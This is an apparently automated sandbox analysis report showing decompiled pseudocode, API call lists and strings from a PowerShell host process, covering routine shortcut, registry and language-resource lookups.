                                                                                                                                                                                                                              0x0125be96
                                                                                                                                                                                                                              0x0125be9b
                                                                                                                                                                                                                              0x0125bed8
                                                                                                                                                                                                                              0x0125bee9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125be9d
                                                                                                                                                                                                                              0x0125be9d
                                                                                                                                                                                                                              0x0125beb4
                                                                                                                                                                                                                              0x0125beba
                                                                                                                                                                                                                              0x0125bebd
                                                                                                                                                                                                                              0x0125bec1
                                                                                                                                                                                                                              0x0125beee
                                                                                                                                                                                                                              0x0125beee
                                                                                                                                                                                                                              0x0125bef3
                                                                                                                                                                                                                              0x0125bef4
                                                                                                                                                                                                                              0x0125bef7
                                                                                                                                                                                                                              0x0125bf08
                                                                                                                                                                                                                              0x0125bf0e
                                                                                                                                                                                                                              0x0125bf10
                                                                                                                                                                                                                              0x0125bf12
                                                                                                                                                                                                                              0x0125bf18
                                                                                                                                                                                                                              0x0125bf1d
                                                                                                                                                                                                                              0x0125bf24
                                                                                                                                                                                                                              0x0125bf25
                                                                                                                                                                                                                              0x0125bf28
                                                                                                                                                                                                                              0x0125bf30
                                                                                                                                                                                                                              0x0125bf32
                                                                                                                                                                                                                              0x0125bf34
                                                                                                                                                                                                                              0x0125bf3f
                                                                                                                                                                                                                              0x0125bf40
                                                                                                                                                                                                                              0x0125bf4a
                                                                                                                                                                                                                              0x0125bf4b
                                                                                                                                                                                                                              0x0125bf4c
                                                                                                                                                                                                                              0x0125bf4e
                                                                                                                                                                                                                              0x0125bf51
                                                                                                                                                                                                                              0x0125bf56
                                                                                                                                                                                                                              0x0125bf57
                                                                                                                                                                                                                              0x0125bf63
                                                                                                                                                                                                                              0x0125bf65
                                                                                                                                                                                                                              0x0125bf6d
                                                                                                                                                                                                                              0x0125bf76
                                                                                                                                                                                                                              0x0125bf7f
                                                                                                                                                                                                                              0x0125bf81
                                                                                                                                                                                                                              0x0125bf87
                                                                                                                                                                                                                              0x0125bf95
                                                                                                                                                                                                                              0x0125bf9d
                                                                                                                                                                                                                              0x0125bf9f
                                                                                                                                                                                                                              0x0125bfa1
                                                                                                                                                                                                                              0x0125bfa7
                                                                                                                                                                                                                              0x0125bfac
                                                                                                                                                                                                                              0x0125bfae
                                                                                                                                                                                                                              0x0125c0ac
                                                                                                                                                                                                                              0x0125c0ac
                                                                                                                                                                                                                              0x0125c0af
                                                                                                                                                                                                                              0x0125c0b6
                                                                                                                                                                                                                              0x0125c0c4
                                                                                                                                                                                                                              0x0125c0cc
                                                                                                                                                                                                                              0x0125c0ce
                                                                                                                                                                                                                              0x0125c0d0
                                                                                                                                                                                                                              0x0125c0d2
                                                                                                                                                                                                                              0x0125c0e0
                                                                                                                                                                                                                              0x0125c0e8
                                                                                                                                                                                                                              0x0125c0e8
                                                                                                                                                                                                                              0x0125c0ed
                                                                                                                                                                                                                              0x0125bfb4
                                                                                                                                                                                                                              0x0125bfb9
                                                                                                                                                                                                                              0x0125bfbf
                                                                                                                                                                                                                              0x0125bfc1
                                                                                                                                                                                                                              0x0125bfc3
                                                                                                                                                                                                                              0x0125bfce
                                                                                                                                                                                                                              0x0125bfcf
                                                                                                                                                                                                                              0x0125bfd9
                                                                                                                                                                                                                              0x0125bfe2
                                                                                                                                                                                                                              0x0125bfe7
                                                                                                                                                                                                                              0x0125bfe8
                                                                                                                                                                                                                              0x0125bfe9
                                                                                                                                                                                                                              0x0125bfeb
                                                                                                                                                                                                                              0x0125bfec
                                                                                                                                                                                                                              0x0125bfed
                                                                                                                                                                                                                              0x0125bfee
                                                                                                                                                                                                                              0x0125bffc
                                                                                                                                                                                                                              0x0125bffe
                                                                                                                                                                                                                              0x0125c007
                                                                                                                                                                                                                              0x0125c00f
                                                                                                                                                                                                                              0x0125c011
                                                                                                                                                                                                                              0x0125c017
                                                                                                                                                                                                                              0x0125c025
                                                                                                                                                                                                                              0x0125c02d
                                                                                                                                                                                                                              0x0125c02f
                                                                                                                                                                                                                              0x0125c031
                                                                                                                                                                                                                              0x0125c03c
                                                                                                                                                                                                                              0x0125c042
                                                                                                                                                                                                                              0x0125c044
                                                                                                                                                                                                                              0x0125c046
                                                                                                                                                                                                                              0x0125c051
                                                                                                                                                                                                                              0x0125c052
                                                                                                                                                                                                                              0x0125c05c
                                                                                                                                                                                                                              0x0125c067
                                                                                                                                                                                                                              0x0125c068
                                                                                                                                                                                                                              0x0125c069
                                                                                                                                                                                                                              0x0125c06a
                                                                                                                                                                                                                              0x0125c06b
                                                                                                                                                                                                                              0x0125c06c
                                                                                                                                                                                                                              0x0125c06d
                                                                                                                                                                                                                              0x0125c079
                                                                                                                                                                                                                              0x0125c07b
                                                                                                                                                                                                                              0x0125c084
                                                                                                                                                                                                                              0x0125c08c
                                                                                                                                                                                                                              0x0125c08e
                                                                                                                                                                                                                              0x0125c090
                                                                                                                                                                                                                              0x0125c09e
                                                                                                                                                                                                                              0x0125c0a6
                                                                                                                                                                                                                              0x0125c0a8
                                                                                                                                                                                                                              0x0125c0aa
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125c0aa
                                                                                                                                                                                                                              0x0125c08e
                                                                                                                                                                                                                              0x0125c046
                                                                                                                                                                                                                              0x0125c031
                                                                                                                                                                                                                              0x0125c011
                                                                                                                                                                                                                              0x0125bfc3
                                                                                                                                                                                                                              0x0125bfae
                                                                                                                                                                                                                              0x0125bfa1
                                                                                                                                                                                                                              0x0125bf81
                                                                                                                                                                                                                              0x0125c0f5
                                                                                                                                                                                                                              0x0125c0f5
                                                                                                                                                                                                                              0x0125c0fd
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bec3
                                                                                                                                                                                                                              0x0125bec1
                                                                                                                                                                                                                              0x0125be9b
                                                                                                                                                                                                                              0x0125be74
                                                                                                                                                                                                                              0x0125c105
                                                                                                                                                                                                                              0x0125c10d
                                                                                                                                                                                                                              0x0125c112
                                                                                                                                                                                                                              0x0125c119

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125BC99
                                                                                                                                                                                                                              • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\PowerShell\3,ConsoleHostShortcutTargetX86,10000006,00000000,00000000,?,00000030,0125C2B0), ref: 0125BCEA
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0125BD1F
                                                                                                                                                                                                                              • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\PowerShell\3,ConsoleHostShortcutTargetX86,10000006,00000000,00000000,?), ref: 0125BD40
                                                                                                                                                                                                                              • SetConsoleTitleW.KERNEL32(?), ref: 0125BDCF
                                                                                                                                                                                                                              • free.MSVCRT(?), ref: 0125BDD8
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(012531B0,00000000,00000001,0125334C,00000000,?,?), ref: 0125BE47
                                                                                                                                                                                                                                • Part of subcall function 0125C81E: GetCurrentProcess.KERNEL32(?,?,0125BCC4,00000030,0125C2B0), ref: 0125C824
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(012531D0,00000000,00000003,0125332C,?,%windir%\System32\WindowsPowerShell\v1.0\powershell.exe,?), ref: 0125BF08
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF65
                                                                                                                                                                                                                              • free.MSVCRT(?,00000000,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF6D
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF76
                                                                                                                                                                                                                                • Part of subcall function 0125C782: GetFileAttributesW.KERNEL32(%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk,0125BD8B), ref: 0125C785
                                                                                                                                                                                                                              • #30.ATL(00000004,00000000,?,00000004), ref: 0125BFD9
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000001,?,00000004,?,00000004), ref: 0125BFFE
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000001,?,00000004,?,00000004), ref: 0125C007
                                                                                                                                                                                                                              • #30.ATL(00000004,00000000,?,00000004,?,00000004), ref: 0125C05C
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000000,?,00000004,?,00000004,?,00000004), ref: 0125C07B
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000000,?,00000004,?,00000004,?,00000004), ref: 0125C084
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %windir%\System32\WindowsPowerShell\v1.0\powershell.exe, xrefs: 0125BECB, 0125BEE5
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\3, xrefs: 0125BCE0, 0125BD36
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell (x86).lnk, xrefs: 0125BD68
                                                                                                                                                                                                                              • %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell(x86).lnk, xrefs: 0125BD58
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\System Tools\Windows PowerShell.lnk, xrefs: 0125BD8F
                                                                                                                                                                                                                              • %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe, xrefs: 0125BFE2, 0125BFEC, 0125C06B
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk, xrefs: 0125BD78
                                                                                                                                                                                                                              • ConsoleHostShortcutTarget, xrefs: 0125BCCD, 0125BCDF, 0125BD35
                                                                                                                                                                                                                              • %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk, xrefs: 0125BD7F, 0125BDFB, 0125BE20
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, xrefs: 0125BD9F
                                                                                                                                                                                                                              • ConsoleHostShortcutTargetX86, xrefs: 0125BCC4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$CreateInstanceValue$AttributesConsoleCurrentFileH_prolog3_ProcessTitlememset
                                                                                                                                                                                                                              • String ID: %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell(x86).lnk$%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell (x86).lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\System Tools\Windows PowerShell.lnk$%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe$%windir%\System32\WindowsPowerShell\v1.0\powershell.exe$ConsoleHostShortcutTarget$ConsoleHostShortcutTargetX86$SOFTWARE\Microsoft\PowerShell\3
                                                                                                                                                                                                                              • API String ID: 3687710492-3771833276
                                                                                                                                                                                                                              • Opcode ID: 3a729c583178f6204c421b6725a5877a999b40660db8627eb84fca01a2a96755
                                                                                                                                                                                                                              • Instruction ID: 5b6485b8ee168658443553a52878fa62de2b3c641f2c17bbc4cc883b747cacc7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a729c583178f6204c421b6725a5877a999b40660db8627eb84fca01a2a96755
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D19371E20216AFDB55DFA4D9C5AFEBB79EF48750F104119EE01B7290EB70AD108BA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D6E4, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 274libraryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                                                              			E0125D6E4(void* __eflags) {
				signed int _v8;
				char _v180;
				char _v352;
				char _v524;
				short _v1044;
				WCHAR* _v1048;
				signed int _v1052;
				signed int _v1056;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				signed int _t74;
				WCHAR* _t83;
				signed char _t86;
				signed char _t87;
				signed int _t88;
				struct HINSTANCE__* _t90;
				signed short _t93;
				signed int _t96;
				signed int _t101;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				signed int _t121;
				struct HINSTANCE__* _t128;
				char* _t158;
				signed int _t159;
				signed int _t160;

				_t72 =  *0x1260358; // 0xc21f7063
				_v8 = _t72 ^ _t160;
				_t158 = 0;
				_v1048 = 0;
				_t74 = E0125D220();
				 *0x12608fc = _t74;
				_t159 = 0;
				_t128 = LoadLibraryExW(L"powershell.exe", 0, _t74 & 0x00000020 | 0x00000002);
				if(_t128 == 0) {
					L46:
					_t77 = 0;
					__eflags = 0;
				} else {
					if(( *0x12608fc & 0x00000020) == 0) {
						if(SearchPathW(0, L"powershell.exe", 0, 0x104,  &_v1044,  &_v1048) == 0) {
							FreeLibrary(_t128);
							goto L46;
						} else {
							_t83 = _v1048;
							if(_t83 != 0) {
								__eflags = 0;
								_t158 =  &_v1044;
								 *((short*)(_t83 - 2)) = 0;
							} else {
								_v1048 =  &_v1044;
							}
							if(FindResourceExW(_t128, ?str?, 1, 0) == 0) {
								L31:
								__eflags = _t128 & 0x00000001;
								if((_t128 & 0x00000001) != 0) {
									FreeLibrary(_t128);
									_t86 = E0125D220();
									__eflags = _t86 & 0x00000038;
									if((_t86 & 0x00000038) == 0) {
										_t87 = E0125D220();
										__eflags = _t87 & 0x00000026;
										_t88 = 0;
										_t70 = (_t87 & 0x00000026) != 0;
										__eflags = _t70;
										_t90 = LoadLibraryExW(L"powershell.exe", 0, _t88 & 0xffffff00 | _t70);
									} else {
										_push(_v1048);
										E0125D56C( &_v1044, 0x104, L"%s\\%s", _t158);
										_t155 = 1;
										_t90 = E0125D4C4( &_v1044, 1, 0);
									}
									_t128 = _t90;
								}
								_t77 = _t128;
							} else {
								_t93 =  *0x12608fc; // 0x0
								if((_t93 & 0x00000004) == 0) {
									__eflags = _t93 & 0x00000003;
									if((_t93 & 0x00000003) == 0) {
										goto L31;
									} else {
										_v1056 = E0125D170() & 0x0000ffff;
										_t155 =  &_v180;
										_t96 = E0125D393(E0125D170() & 0x0000ffff,  &_v180,  &_v524,  &_v352);
										__eflags = _t96;
										if(_t96 == 0) {
											goto L31;
										} else {
											_t155 = _t158;
											_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
											__eflags = _t159;
											if(_t159 != 0) {
												goto L41;
											} else {
												_t155 = _t158;
												_t101 = E0125D32D(_t128, _t158,  &_v524, _v1048);
												_t159 = _t101;
												__eflags = _t159;
												if(_t159 != 0) {
													goto L41;
												} else {
													__eflags = _v352 - _t101;
													if(_v352 == _t101) {
														L40:
														_t138 = 0x409;
														__eflags = 0x409 - _v1056;
														goto L27;
													} else {
														_t155 = _t158;
														_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
														__eflags = _t159;
														if(_t159 != 0) {
															goto L41;
														} else {
															goto L40;
														}
													}
												}
											}
										}
									}
								} else {
									__imp__GetUserDefaultUILanguage();
									_t109 = _t93 & 0x0000ffff;
									_v1052 = _t109;
									if(_t109 == 0x404) {
										_t109 = E0125D111() & 0x0000ffff;
										L10:
										_v1052 = _t109;
									}
									_t155 =  &_v180;
									if(E0125D393(_t109,  &_v180,  &_v524,  &_v352) == 0) {
										L30:
										__eflags = _t159;
										if(_t159 != 0) {
											goto L41;
										} else {
											goto L31;
										}
									} else {
										_t155 = _t158;
										_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
										if(_t159 != 0) {
											L41:
											FreeLibrary(_t128);
											_t77 = _t159;
										} else {
											_t155 = _t158;
											_t114 = E0125D32D(_t128, _t158,  &_v524, _v1048);
											_t159 = _t114;
											if(_t159 != 0) {
												goto L41;
											} else {
												if(_v352 == _t114) {
													L16:
													if(_v1052 != 0xc04) {
														__imp__GetSystemDefaultUILanguage();
														_t116 = 0xc04;
														_v1056 = 0xc04;
														__eflags = 0xc04 - _v1052;
														if(0xc04 == _v1052) {
															L25:
															_t138 = 0x409;
															__eflags = 0x409 - _v1052;
															if(0x409 == _v1052) {
																L29:
																_t155 = _t158;
																_t159 = E0125D32D(_t128, _t158, 0, _v1048);
																goto L30;
															} else {
																__eflags = 0x409 - _t116;
																L27:
																if(__eflags == 0) {
																	goto L29;
																} else {
																	E0125D393(_t138,  &_v180,  &_v524, 0);
																	_t155 = _t158;
																	_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
																	__eflags = _t159;
																	if(_t159 != 0) {
																		goto L41;
																	} else {
																		goto L29;
																	}
																}
															}
														} else {
															_t155 =  &_v180;
															_t117 = E0125D393(0xc04,  &_v180,  &_v524,  &_v352);
															__eflags = _t117;
															if(_t117 == 0) {
																goto L31;
															} else {
																_t155 = _t158;
																_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
																__eflags = _t159;
																if(_t159 != 0) {
																	goto L41;
																} else {
																	_t155 = _t158;
																	_t121 = E0125D32D(_t128, _t158,  &_v524, _v1048);
																	_t159 = _t121;
																	__eflags = _t159;
																	if(_t159 != 0) {
																		goto L41;
																	} else {
																		__eflags = _v352 - _t121;
																		if(_v352 == _t121) {
																			L24:
																			_t116 = _v1056;
																			goto L25;
																		} else {
																			_t155 = _t158;
																			_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
																			__eflags = _t159;
																			if(_t159 != 0) {
																				goto L41;
																			} else {
																				goto L24;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t109 = 0x404;
														goto L10;
													}
												} else {
													_t155 = _t158;
													_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
													if(_t159 != 0) {
														goto L41;
													} else {
														goto L16;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				__eflags = _v8 ^ _t160;
				return E01259A40(_t77, _t128, _v8 ^ _t160, _t155, _t158, _t159);
			}
































                                                                                                                                                                                                                              0x0125d6ef
                                                                                                                                                                                                                              0x0125d6f6
                                                                                                                                                                                                                              0x0125d6fc
                                                                                                                                                                                                                              0x0125d6fe
                                                                                                                                                                                                                              0x0125d704
                                                                                                                                                                                                                              0x0125d709
                                                                                                                                                                                                                              0x0125d70e
                                                                                                                                                                                                                              0x0125d723
                                                                                                                                                                                                                              0x0125d727
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125d72d
                                                                                                                                                                                                                              0x0125d734
                                                                                                                                                                                                                              0x0125d75c
                                                                                                                                                                                                                              0x0125daa8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d762
                                                                                                                                                                                                                              0x0125d762
                                                                                                                                                                                                                              0x0125d76a
                                                                                                                                                                                                                              0x0125d77a
                                                                                                                                                                                                                              0x0125d77c
                                                                                                                                                                                                                              0x0125d782
                                                                                                                                                                                                                              0x0125d76c
                                                                                                                                                                                                                              0x0125d772
                                                                                                                                                                                                                              0x0125d772
                                                                                                                                                                                                                              0x0125d798
                                                                                                                                                                                                                              0x0125d986
                                                                                                                                                                                                                              0x0125d986
                                                                                                                                                                                                                              0x0125d989
                                                                                                                                                                                                                              0x0125d990
                                                                                                                                                                                                                              0x0125d996
                                                                                                                                                                                                                              0x0125d99b
                                                                                                                                                                                                                              0x0125d99d
                                                                                                                                                                                                                              0x0125da86
                                                                                                                                                                                                                              0x0125da8d
                                                                                                                                                                                                                              0x0125da8f
                                                                                                                                                                                                                              0x0125da90
                                                                                                                                                                                                                              0x0125da90
                                                                                                                                                                                                                              0x0125da9b
                                                                                                                                                                                                                              0x0125d9a3
                                                                                                                                                                                                                              0x0125d9a3
                                                                                                                                                                                                                              0x0125d9bb
                                                                                                                                                                                                                              0x0125d9cb
                                                                                                                                                                                                                              0x0125d9ce
                                                                                                                                                                                                                              0x0125d9ce
                                                                                                                                                                                                                              0x0125daa1
                                                                                                                                                                                                                              0x0125daa1
                                                                                                                                                                                                                              0x0125daa3
                                                                                                                                                                                                                              0x0125d79e
                                                                                                                                                                                                                              0x0125d79e
                                                                                                                                                                                                                              0x0125d7a5
                                                                                                                                                                                                                              0x0125d9d8
                                                                                                                                                                                                                              0x0125d9da
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d9dc
                                                                                                                                                                                                                              0x0125d9f1
                                                                                                                                                                                                                              0x0125d9f8
                                                                                                                                                                                                                              0x0125da00
                                                                                                                                                                                                                              0x0125da05
                                                                                                                                                                                                                              0x0125da07
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125da0d
                                                                                                                                                                                                                              0x0125da19
                                                                                                                                                                                                                              0x0125da23
                                                                                                                                                                                                                              0x0125da25
                                                                                                                                                                                                                              0x0125da27
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125da29
                                                                                                                                                                                                                              0x0125da35
                                                                                                                                                                                                                              0x0125da3a
                                                                                                                                                                                                                              0x0125da3f
                                                                                                                                                                                                                              0x0125da41
                                                                                                                                                                                                                              0x0125da43
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125da45
                                                                                                                                                                                                                              0x0125da45
                                                                                                                                                                                                                              0x0125da4c
                                                                                                                                                                                                                              0x0125da6a
                                                                                                                                                                                                                              0x0125da6a
                                                                                                                                                                                                                              0x0125da6f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125da4e
                                                                                                                                                                                                                              0x0125da5a
                                                                                                                                                                                                                              0x0125da64
                                                                                                                                                                                                                              0x0125da66
                                                                                                                                                                                                                              0x0125da68
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125da68
                                                                                                                                                                                                                              0x0125da4c
                                                                                                                                                                                                                              0x0125da43
                                                                                                                                                                                                                              0x0125da27
                                                                                                                                                                                                                              0x0125da07
                                                                                                                                                                                                                              0x0125d7ab
                                                                                                                                                                                                                              0x0125d7ab
                                                                                                                                                                                                                              0x0125d7b1
                                                                                                                                                                                                                              0x0125d7b9
                                                                                                                                                                                                                              0x0125d7c2
                                                                                                                                                                                                                              0x0125d7c9
                                                                                                                                                                                                                              0x0125d7cc
                                                                                                                                                                                                                              0x0125d7cc
                                                                                                                                                                                                                              0x0125d7cc
                                                                                                                                                                                                                              0x0125d7e0
                                                                                                                                                                                                                              0x0125d7ef
                                                                                                                                                                                                                              0x0125d97e
                                                                                                                                                                                                                              0x0125d97e
                                                                                                                                                                                                                              0x0125d980
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d7f5
                                                                                                                                                                                                                              0x0125d801
                                                                                                                                                                                                                              0x0125d80b
                                                                                                                                                                                                                              0x0125d80f
                                                                                                                                                                                                                              0x0125da7b
                                                                                                                                                                                                                              0x0125da7c
                                                                                                                                                                                                                              0x0125da82
                                                                                                                                                                                                                              0x0125d815
                                                                                                                                                                                                                              0x0125d821
                                                                                                                                                                                                                              0x0125d826
                                                                                                                                                                                                                              0x0125d82b
                                                                                                                                                                                                                              0x0125d82f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d835
                                                                                                                                                                                                                              0x0125d83c
                                                                                                                                                                                                                              0x0125d85e
                                                                                                                                                                                                                              0x0125d86a
                                                                                                                                                                                                                              0x0125d876
                                                                                                                                                                                                                              0x0125d87c
                                                                                                                                                                                                                              0x0125d87f
                                                                                                                                                                                                                              0x0125d885
                                                                                                                                                                                                                              0x0125d88c
                                                                                                                                                                                                                              0x0125d924
                                                                                                                                                                                                                              0x0125d924
                                                                                                                                                                                                                              0x0125d929
                                                                                                                                                                                                                              0x0125d930
                                                                                                                                                                                                                              0x0125d96b
                                                                                                                                                                                                                              0x0125d971
                                                                                                                                                                                                                              0x0125d97c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d932
                                                                                                                                                                                                                              0x0125d932
                                                                                                                                                                                                                              0x0125d935
                                                                                                                                                                                                                              0x0125d935
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d937
                                                                                                                                                                                                                              0x0125d946
                                                                                                                                                                                                                              0x0125d957
                                                                                                                                                                                                                              0x0125d961
                                                                                                                                                                                                                              0x0125d963
                                                                                                                                                                                                                              0x0125d965
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d965
                                                                                                                                                                                                                              0x0125d935
                                                                                                                                                                                                                              0x0125d892
                                                                                                                                                                                                                              0x0125d8a0
                                                                                                                                                                                                                              0x0125d8a8
                                                                                                                                                                                                                              0x0125d8ad
                                                                                                                                                                                                                              0x0125d8af
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d8b5
                                                                                                                                                                                                                              0x0125d8c1
                                                                                                                                                                                                                              0x0125d8cb
                                                                                                                                                                                                                              0x0125d8cd
                                                                                                                                                                                                                              0x0125d8cf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d8d5
                                                                                                                                                                                                                              0x0125d8e1
                                                                                                                                                                                                                              0x0125d8e6
                                                                                                                                                                                                                              0x0125d8eb
                                                                                                                                                                                                                              0x0125d8ed
                                                                                                                                                                                                                              0x0125d8ef
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d8f5
                                                                                                                                                                                                                              0x0125d8f5
                                                                                                                                                                                                                              0x0125d8fc
                                                                                                                                                                                                                              0x0125d91e
                                                                                                                                                                                                                              0x0125d91e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d8fe
                                                                                                                                                                                                                              0x0125d90a
                                                                                                                                                                                                                              0x0125d914
                                                                                                                                                                                                                              0x0125d916
                                                                                                                                                                                                                              0x0125d918
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d918
                                                                                                                                                                                                                              0x0125d8fc
                                                                                                                                                                                                                              0x0125d8ef
                                                                                                                                                                                                                              0x0125d8cf
                                                                                                                                                                                                                              0x0125d8af
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x0125d83e
                                                                                                                                                                                                                              0x0125d84a
                                                                                                                                                                                                                              0x0125d854
                                                                                                                                                                                                                              0x0125d858
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d858
                                                                                                                                                                                                                              0x0125d83c
                                                                                                                                                                                                                              0x0125d82f
                                                                                                                                                                                                                              0x0125d80f
                                                                                                                                                                                                                              0x0125d7ef
                                                                                                                                                                                                                              0x0125d7a5
                                                                                                                                                                                                                              0x0125d798
                                                                                                                                                                                                                              0x0125d75c
                                                                                                                                                                                                                              0x0125d734
                                                                                                                                                                                                                              0x0125dab5
                                                                                                                                                                                                                              0x0125dac0

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0125D220: memset.MSVCRT ref: 0125D253
                                                                                                                                                                                                                                • Part of subcall function 0125D220: GetVersionExW.KERNEL32(?,?,00000000), ref: 0125D268
                                                                                                                                                                                                                                • Part of subcall function 0125D220: GetVersionExW.KERNEL32(?,00000000), ref: 0125D284
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(powershell.exe,00000000,00000000), ref: 0125D71D
                                                                                                                                                                                                                              • SearchPathW.KERNEL32(00000000,powershell.exe,00000000,00000104,?,?), ref: 0125D754
                                                                                                                                                                                                                              • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000), ref: 0125D790
                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNEL32 ref: 0125D7AB
                                                                                                                                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 0125D876
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0125D990
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 0125DA7C
